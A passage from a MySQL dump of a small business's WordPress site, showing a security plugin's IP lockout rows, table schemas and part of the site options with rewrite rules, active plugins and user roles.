132.215','normal','',0,0,0,0,0,'[]'),(4498,'113.142.141.105','normal','',0,0,0,0,0,'[]'),(4499,'135.125.183.202','normal','',0,0,0,0,0,'[]'),(4500,'89.248.165.195','normal','',0,0,0,0,0,'[]'),(4501,'20.116.12.36','normal','',0,0,0,0,0,'[]'),(4502,'13.90.115.5','normal','',0,0,0,0,0,'[]'),(4503,'66.249.66.143','normal','',0,0,0,0,0,'[]'),(4504,'84.17.46.194','normal','',0,0,0,0,0,'[]'),(4505,'141.95.89.75','normal','',0,0,0,0,0,'[]'),(4506,'20.169.38.5','normal','',0,0,0,0,0,'[]'),(4507,'34.138.126.6','normal','',0,0,0,0,0,'[]'),(4508,'103.147.241.56','normal','',0,0,0,0,0,'[]'),(4509,'114.119.155.170','normal','',0,0,0,0,0,'[]'),(4510,'92.204.138.28','normal','',0,0,0,0,0,'[]'),(4511,'173.231.218.25','normal','',0,0,0,0,0,'[]');
/*!40000 ALTER TABLE `wp0y_defender_lockout` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp0y_defender_lockout_log`
--

DROP TABLE IF EXISTS `wp0y_defender_lockout_log`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp0y_defender_lockout_log` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `log` text COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `ip` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `date` int(11) DEFAULT NULL,
  `type` varchar(16) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `user_agent` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `blog_id` int(11) DEFAULT NULL,
  `tried` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `country_iso_code` char(2) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `ip` (`ip`(250)),
  KEY `type` (`type`),
  KEY `tried` (`tried`(250)),
  KEY `country_iso_code` (`country_iso_code`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp0y_defender_lockout_log`
--

LOCK TABLES `wp0y_defender_lockout_log` WRITE;
/*!40000 ALTER TABLE `wp0y_defender_lockout_log` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp0y_defender_lockout_log` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp0y_defender_scan`
--

DROP TABLE IF EXISTS `wp0y_defender_scan`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp0y_defender_scan` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `percent` float NOT NULL,
  `total_tasks` tinyint(4) NOT NULL,
  `task_checkpoint` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL,
  `status` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL,
  `date_start` datetime NOT NULL,
  `date_end` datetime NOT NULL,
  `is_automation` tinyint(1) NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp0y_defender_scan`
--

LOCK TABLES `wp0y_defender_scan` WRITE;
/*!40000 ALTER TABLE `wp0y_defender_scan` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp0y_defender_scan` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp0y_defender_scan_item`
--

DROP TABLE IF EXISTS `wp0y_defender_scan_item`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp0y_defender_scan_item` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `parent_id` int(11) NOT NULL,
  `type` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL,
  `status` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL,
  `raw_data` text COLLATE utf8mb4_unicode_ci NOT NULL,
  PRIMARY KEY (`id`),
  KEY `type` (`type`(250)),
  KEY `status` (`status`(250))
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp0y_defender_scan_item`
--

LOCK TABLES `wp0y_defender_scan_item` WRITE;
/*!40000 ALTER TABLE `wp0y_defender_scan_item` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp0y_defender_scan_item` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp0y_links`
--

DROP TABLE IF EXISTS `wp0y_links`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp0y_links` (
  `link_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `link_url` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `link_name` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `link_image` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `link_target` varchar(25) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `link_description` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `link_visible` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'Y',
  `link_owner` bigint(20) unsigned NOT NULL DEFAULT 1,
  `link_rating` int(11) NOT NULL DEFAULT 0,
  `link_updated` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `link_rel` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `link_notes` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `link_rss` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  PRIMARY KEY (`link_id`),
  KEY `link_visible` (`link_visible`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp0y_links`
--

LOCK TABLES `wp0y_links` WRITE;
/*!40000 ALTER TABLE `wp0y_links` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp0y_links` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp0y_options`
--

DROP TABLE IF EXISTS `wp0y_options`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp0y_options` (
  `option_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `option_name` varchar(191) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `option_value` longtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `autoload` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'yes',
  PRIMARY KEY (`option_id`),
  UNIQUE KEY `option_name` (`option_name`),
  KEY `autoload` (`autoload`)
) ENGINE=MyISAM AUTO_INCREMENT=20227 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp0y_options`
--

LOCK TABLES `wp0y_options` WRITE;
/*!40000 ALTER TABLE `wp0y_options` DISABLE KEYS */;
INSERT INTO `wp0y_options` VALUES (1,'siteurl','https://cteisys.com','yes'),(2,'home','https://cteisys.com','yes'),(3,'blogname','Roofing And Siding','yes'),(4,'blogdescription','Roofing And Siding in lower Michigan','yes'),(5,'users_can_register','0','yes'),(6,'admin_email','admin@cteisys.com','yes'),(7,'start_of_week','1','yes'),(8,'use_balanceTags','0','yes'),(9,'use_smilies','1','yes'),(10,'require_name_email','','yes'),(11,'comments_notify','','yes'),(12,'posts_per_rss','10','yes'),(13,'rss_use_excerpt','0','yes'),(14,'mailserver_url','mail.example.com','yes'),(15,'mailserver_login','login@example.com','yes'),(16,'mailserver_pass','password','yes'),(17,'mailserver_port','110','yes'),(18,'default_category','1','yes'),(19,'default_comment_status','','yes'),(20,'default_ping_status','','yes'),(21,'default_pingback_flag','','yes'),(22,'posts_per_page','10','yes'),(23,'date_format','F j, Y','yes'),(24,'time_format','g:i a','yes'),(25,'links_updated_date_format','F j, Y g:i a','yes'),(26,'comment_moderation','','yes'),(27,'moderation_notify','','yes'),(28,'permalink_structure','/%year%/%monthnum%/%day%/%postname%/','yes'),(29,'rewrite_rules','a:97:{s:11:\"^wp-json/?$\";s:22:\"index.php?rest_route=/\";s:14:\"^wp-json/(.*)?\";s:33:\"index.php?rest_route=/$matches[1]\";s:21:\"^index.php/wp-json/?$\";s:22:\"index.php?rest_route=/\";s:24:\"^index.php/wp-json/(.*)?\";s:33:\"index.php?rest_route=/$matches[1]\";s:17:\"^wp-sitemap\\.xml$\";s:23:\"index.php?sitemap=index\";s:17:\"^wp-sitemap\\.xsl$\";s:36:\"index.php?sitemap-stylesheet=sitemap\";s:23:\"^wp-sitemap-index\\.xsl$\";s:34:\"index.php?sitemap-stylesheet=index\";s:48:\"^wp-sitemap-([a-z]+?)-([a-z\\d_-]+?)-(\\d+?)\\.xml$\";s:75:\"index.php?sitemap=$matches[1]&sitemap-subtype=$matches[2]&paged=$matches[3]\";s:34:\"^wp-sitemap-([a-z]+?)-(\\d+?)\\.xml$\";s:47:\"index.php?sitemap=$matches[1]&paged=$matches[2]\";s:47:\"category/(.+?)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:52:\"index.php?category_name=$matches[1]&feed=$matches[2]\";s:42:\"category/(.+?)/(feed|rdf|rss|rss2|atom)/?$\";s:52:\"index.php?category_name=$matches[1]&feed=$matches[2]\";s:23:\"category/(.+?)/embed/?$\";s:46:\"index.php?category_name=$matches[1]&embed=true\";s:35:\"category/(.+?)/page/?([0-9]{1,})/?$\";s:53:\"index.php?category_name=$matches[1]&paged=$matches[2]\";s:17:\"category/(.+?)/?$\";s:35:\"index.php?category_name=$matches[1]\";s:44:\"tag/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?tag=$matches[1]&feed=$matches[2]\";s:39:\"tag/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?tag=$matches[1]&feed=$matches[2]\";s:20:\"tag/([^/]+)/embed/?$\";s:36:\"index.php?tag=$matches[1]&embed=true\";s:32:\"tag/([^/]+)/page/?([0-9]{1,})/?$\";s:43:\"index.php?tag=$matches[1]&paged=$matches[2]\";s:14:\"tag/([^/]+)/?$\";s:25:\"index.php?tag=$matches[1]\";s:45:\"type/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?post_format=$matches[1]&feed=$matches[2]\";s:40:\"type/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?post_format=$matches[1]&feed=$matches[2]\";s:21:\"type/([^/]+)/embed/?$\";s:44:\"index.php?post_format=$matches[1]&embed=true\";s:33:\"type/([^/]+)/page/?([0-9]{1,})/?$\";s:51:\"index.php?post_format=$matches[1]&paged=$matches[2]\";s:15:\"type/([^/]+)/?$\";s:33:\"index.php?post_format=$matches[1]\";s:12:\"robots\\.txt$\";s:18:\"index.php?robots=1\";s:13:\"favicon\\.ico$\";s:19:\"index.php?favicon=1\";s:48:\".*wp-(atom|rdf|rss|rss2|feed|commentsrss2)\\.php$\";s:18:\"index.php?feed=old\";s:20:\".*wp-app\\.php(/.*)?$\";s:19:\"index.php?error=403\";s:18:\".*wp-register.php$\";s:23:\"index.php?register=true\";s:32:\"feed/(feed|rdf|rss|rss2|atom)/?$\";s:27:\"index.php?&feed=$matches[1]\";s:27:\"(feed|rdf|rss|rss2|atom)/?$\";s:27:\"index.php?&feed=$matches[1]\";s:8:\"embed/?$\";s:21:\"index.php?&embed=true\";s:20:\"page/?([0-9]{1,})/?$\";s:28:\"index.php?&paged=$matches[1]\";s:27:\"comment-page-([0-9]{1,})/?$\";s:40:\"index.php?&page_id=336&cpage=$matches[1]\";s:41:\"comments/feed/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?&feed=$matches[1]&withcomments=1\";s:36:\"comments/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?&feed=$matches[1]&withcomments=1\";s:17:\"comments/embed/?$\";s:21:\"index.php?&embed=true\";s:44:\"search/(.+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:40:\"index.php?s=$matches[1]&feed=$matches[2]\";s:39:\"search/(.+)/(feed|rdf|rss|rss2|atom)/?$\";s:40:\"index.php?s=$matches[1]&feed=$matches[2]\";s:20:\"search/(.+)/embed/?$\";s:34:\"index.php?s=$matches[1]&embed=true\";s:32:\"search/(.+)/page/?([0-9]{1,})/?$\";s:41:\"index.php?s=$matches[1]&paged=$matches[2]\";s:14:\"search/(.+)/?$\";s:23:\"index.php?s=$matches[1]\";s:47:\"author/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?author_name=$matches[1]&feed=$matches[2]\";s:42:\"author/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?author_name=$matches[1]&feed=$matches[2]\";s:23:\"author/([^/]+)/embed/?$\";s:44:\"index.php?author_name=$matches[1]&embed=true\";s:35:\"author/([^/]+)/page/?([0-9]{1,})/?$\";s:51:\"index.php?author_name=$matches[1]&paged=$matches[2]\";s:17:\"author/([^/]+)/?$\";s:33:\"index.php?author_name=$matches[1]\";s:69:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:80:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&feed=$matches[4]\";s:64:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/(feed|rdf|rss|rss2|atom)/?$\";s:80:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&feed=$matches[4]\";s:45:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/embed/?$\";s:74:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&embed=true\";s:57:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/page/?([0-9]{1,})/?$\";s:81:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&paged=$matches[4]\";s:39:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/?$\";s:63:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]\";s:56:\"([0-9]{4})/([0-9]{1,2})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:64:\"index.php?year=$matches[1]&monthnum=$matches[2]&feed=$matches[3]\";s:51:\"([0-9]{4})/([0-9]{1,2})/(feed|rdf|rss|rss2|atom)/?$\";s:64:\"index.php?year=$matches[1]&monthnum=$matches[2]&feed=$matches[3]\";s:32:\"([0-9]{4})/([0-9]{1,2})/embed/?$\";s:58:\"index.php?year=$matches[1]&monthnum=$matches[2]&embed=true\";s:44:\"([0-9]{4})/([0-9]{1,2})/page/?([0-9]{1,})/?$\";s:65:\"index.php?year=$matches[1]&monthnum=$matches[2]&paged=$matches[3]\";s:26:\"([0-9]{4})/([0-9]{1,2})/?$\";s:47:\"index.php?year=$matches[1]&monthnum=$matches[2]\";s:43:\"([0-9]{4})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?year=$matches[1]&feed=$matches[2]\";s:38:\"([0-9]{4})/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?year=$matches[1]&feed=$matches[2]\";s:19:\"([0-9]{4})/embed/?$\";s:37:\"index.php?year=$matches[1]&embed=true\";s:31:\"([0-9]{4})/page/?([0-9]{1,})/?$\";s:44:\"index.php?year=$matches[1]&paged=$matches[2]\";s:13:\"([0-9]{4})/?$\";s:26:\"index.php?year=$matches[1]\";s:58:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:68:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:88:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:83:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:83:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:64:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:53:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/([^/]+)/embed/?$\";s:91:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&name=$matches[4]&embed=true\";s:57:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/([^/]+)/trackback/?$\";s:85:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&name=$matches[4]&tb=1\";s:77:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:97:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&name=$matches[4]&feed=$matches[5]\";s:72:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:97:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&name=$matches[4]&feed=$matches[5]\";s:65:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/([^/]+)/page/?([0-9]{1,})/?$\";s:98:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&name=$matches[4]&paged=$matches[5]\";s:72:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/([^/]+)/comment-page-([0-9]{1,})/?$\";s:98:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&name=$matches[4]&cpage=$matches[5]\";s:61:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/([^/]+)(?:/([0-9]+))?/?$\";s:97:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&name=$matches[4]&page=$matches[5]\";s:47:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:57:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:77:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:72:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:72:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:53:\"[0-9]{4}/[0-9]{1,2}/[0-9]{1,2}/[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:64:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/comment-page-([0-9]{1,})/?$\";s:81:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&cpage=$matches[4]\";s:51:\"([0-9]{4})/([0-9]{1,2})/comment-page-([0-9]{1,})/?$\";s:65:\"index.php?year=$matches[1]&monthnum=$matches[2]&cpage=$matches[3]\";s:38:\"([0-9]{4})/comment-page-([0-9]{1,})/?$\";s:44:\"index.php?year=$matches[1]&cpage=$matches[2]\";s:27:\".?.+?/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:37:\".?.+?/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:57:\".?.+?/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\".?.+?/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\".?.+?/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:33:\".?.+?/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:16:\"(.?.+?)/embed/?$\";s:41:\"index.php?pagename=$matches[1]&embed=true\";s:20:\"(.?.+?)/trackback/?$\";s:35:\"index.php?pagename=$matches[1]&tb=1\";s:40:\"(.?.+?)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:47:\"index.php?pagename=$matches[1]&feed=$matches[2]\";s:35:\"(.?.+?)/(feed|rdf|rss|rss2|atom)/?$\";s:47:\"index.php?pagename=$matches[1]&feed=$matches[2]\";s:28:\"(.?.+?)/page/?([0-9]{1,})/?$\";s:48:\"index.php?pagename=$matches[1]&paged=$matches[2]\";s:35:\"(.?.+?)/comment-page-([0-9]{1,})/?$\";s:48:\"index.php?pagename=$matches[1]&cpage=$matches[2]\";s:24:\"(.?.+?)(?:/([0-9]+))?/?$\";s:47:\"index.php?pagename=$matches[1]&page=$matches[2]\";}','yes'),(30,'hack_file','0','yes'),(31,'blog_charset','UTF-8','yes'),(32,'moderation_keys','','no'),(33,'active_plugins','a:9:{i:0;s:19:\"akismet/akismet.php\";i:1;s:51:\"all-in-one-wp-migration/all-in-one-wp-migration.php\";i:2;s:36:\"contact-form-7/wp-contact-form-7.php\";i:3;s:33:\"defender-security/wp-defender.php\";i:4;s:19:\"jetpack/jetpack.php\";i:5;s:25:\"skt-blocks/skt-blocks.php\";i:6;s:39:\"theme-demo-import/theme-demo-import.php\";i:7;s:23:\"wp-cerber/wp-cerber.php\";i:8;s:23:\"wp-smushit/wp-smush.php\";}','yes'),(34,'category_base','','yes'),(35,'ping_sites','http://rpc.pingomatic.com/','yes'),(36,'comment_max_links','2','yes'),(37,'gmt_offset','0','yes'),(38,'default_email_category','1','yes'),(39,'recently_edited','a:2:{i:0;s:64:\"/home/cteisys/public_html/wp-content/plugins/akismet/akismet.php\";i:1;s:0:\"\";}','no'),(40,'template','skt-gb-renovation','yes'),(41,'stylesheet','skt-gb-renovation','yes'),(42,'comment_registration','','yes'),(43,'html_type','text/html','yes'),(44,'use_trackback','0','yes'),(45,'default_role','subscriber','yes'),(46,'db_version','53496','yes'),(47,'uploads_use_yearmonth_folders','1','yes'),(48,'upload_path','','yes'),(49,'blog_public','1','yes'),(50,'default_link_category','2','yes'),(51,'show_on_front','page','yes'),(52,'tag_base','','yes'),(53,'show_avatars','','yes'),(54,'avatar_rating','G','yes'),(55,'upload_url_path','','yes'),(56,'thumbnail_size_w','150','yes'),(57,'thumbnail_size_h','150','yes'),(58,'thumbnail_crop','1','yes'),(59,'medium_size_w','300','yes'),(60,'medium_size_h','300','yes'),(61,'avatar_default','mystery','yes'),(62,'large_size_w','1024','yes'),(63,'large_size_h','1024','yes'),(64,'image_default_link_type','none','yes'),(65,'image_default_size','','yes'),(66,'image_default_align','','yes'),(67,'close_comments_for_old_posts','','yes'),(68,'close_comments_days_old','14','yes'),(69,'thread_comments','','yes'),(70,'thread_comments_depth','5','yes'),(71,'page_comments','','yes'),(72,'comments_per_page','50','yes'),(73,'default_comments_page','newest','yes'),(74,'comment_order','asc','yes'),(75,'sticky_posts','a:0:{}','yes'),(76,'widget_categories','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(77,'widget_text','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(78,'widget_rss','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(79,'uninstall_plugins','a:1:{s:23:\"wp-cerber/wp-cerber.php\";s:13:\"cerber_finito\";}','no'),(80,'timezone_string','','yes'),(81,'page_for_posts','0','yes'),(82,'page_on_front','336','yes'),(83,'default_post_format','0','yes'),(84,'link_manager_enabled','0','yes'),(85,'finished_splitting_shared_terms','1','yes'),(86,'site_icon','363','yes'),(87,'medium_large_size_w','768','yes'),(88,'medium_large_size_h','0','yes'),(89,'wp_page_for_privacy_policy','3','yes'),(90,'show_comments_cookies_opt_in','','yes'),(91,'admin_email_lifespan','1676677688','yes'),(92,'disallowed_keys','','no'),(93,'comment_previously_approved','','yes'),(94,'auto_plugin_theme_update_emails','a:0:{}','no'),(95,'auto_update_core_dev','enabled','yes'),(96,'auto_update_core_minor','enabled','yes'),(97,'auto_update_core_major','enabled','yes'),(98,'wp_force_deactivated_plugins','a:0:{}','yes'),(99,'initial_db_version','53496','yes'),(100,'wp0y_user_roles','a:5:{s:13:\"administrator\";a:2:{s:4:\"name\";s:13:\"Administrator\";s:12:\"capabilities\";a:61:{s:13:\"switch_themes\";b:1;s:11:\"edit_themes\";b:1;s:16:\"activate_plugins\";b:1;s:12:\"edit_plugins\";b:1;s:10:\"edit_users\";b:1;s:10:\"edit_files\";b:1;s:14:\"manage_options\";b:1;s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:6:\"import\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:8:\"level_10\";b:1;s:7:\"level_9\";b:1;s:7:\"level_8\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:12:\"delete_users\";b:1;s:12:\"create_users\";b:1;s:17:\"unfiltered_upload\";b:1;s:14:\"edit_dashboard\";b:1;s:14:\"update_plugins\";b:1;s:14:\"delete_plugins\";b:1;s:15:\"install_plugins\";b:1;s:13:\"update_themes\";b:1;s:14:\"install_themes\";b:1;s:11:\"update_core\";b:1;s:10:\"list_users\";b:1;s:12:\"remove_users\";b:1;s:13:\"promote_users\";b:1;s:18:\"edit_theme_options\";b:1;s:13:\"delete_themes\";b:1;s:6:\"export\";b:1;}}s:6:\"editor\";a:2:{s:4:\"name\";s:6:\"Editor\";s:12:\"capabilities\";a:34:{s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;}}s:6:\"author\";a:2:{s:4:\"name\";s:6:\"Author\";s:12:\"capabilities\";a:10:{s:12:\"upload_files\";b:1;s:10:\"edit_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:4:\"read\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:12:\"delete_posts\";b:1;s:22:\"delete_published_posts\";b:1;}}s:11:\"contributor\";a:2:{s:4:\"name\";s:11:\"Contributor\";s:12:\"capabilities\";a:5:{s:10:\"edit_posts\";b:1;s:4:\"read\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:12:\"delete_posts\";b:1;}}s:10:\"subscriber\";a:2:{s:4:\"name\";s:10:\"Subscriber\";s:12:\"capabilities\";a:2:{s